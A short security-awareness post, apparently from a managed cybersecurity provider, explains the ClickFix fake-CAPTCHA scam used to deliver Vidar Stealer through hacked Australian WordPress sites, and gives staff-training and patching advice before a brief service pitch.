ClickFix is a scam that tricks you into running a malicious command on your own computer. You land on a normal-looking web page, see a fake “Verify that you are human” prompt, and when you click it a pop-up tells you to paste something into Windows PowerShell or the Run box “to fix” the page. That pasted text is malware. The sneaky part: the page has already copied the command to your clipboard, so you are simply told to paste it and press Enter.

The ACSC has warned that ClickFix is being used right now against Australian businesses to deliver Vidar Stealer, malware that grabs saved passwords and login tokens. What makes this campaign local is the delivery: attackers are injecting the fake CAPTCHA into compromised WordPress sites belonging to legitimate Australian businesses. So the booby-trapped page can be a real company’s website that has been hacked — not an obviously dodgy link. The usual “don’t click suspicious links” advice misses it, because the victim runs the dangerous part themselves.

Two things follow for your business. First, train your team on one simple rule: no legitimate website will ever ask you to paste a command into PowerShell or Terminal — if one does, close the tab. Second, if you run a WordPress site, keep it patched and remove unused themes and plugins, because that is how attackers get in to plant the trap. On work devices, restricting who can run scripts stops the command even if someone is fooled.

If you would like a hand locking down staff devices or your WordPress site, that is part of what our managed cybersecurity and security awareness training cover.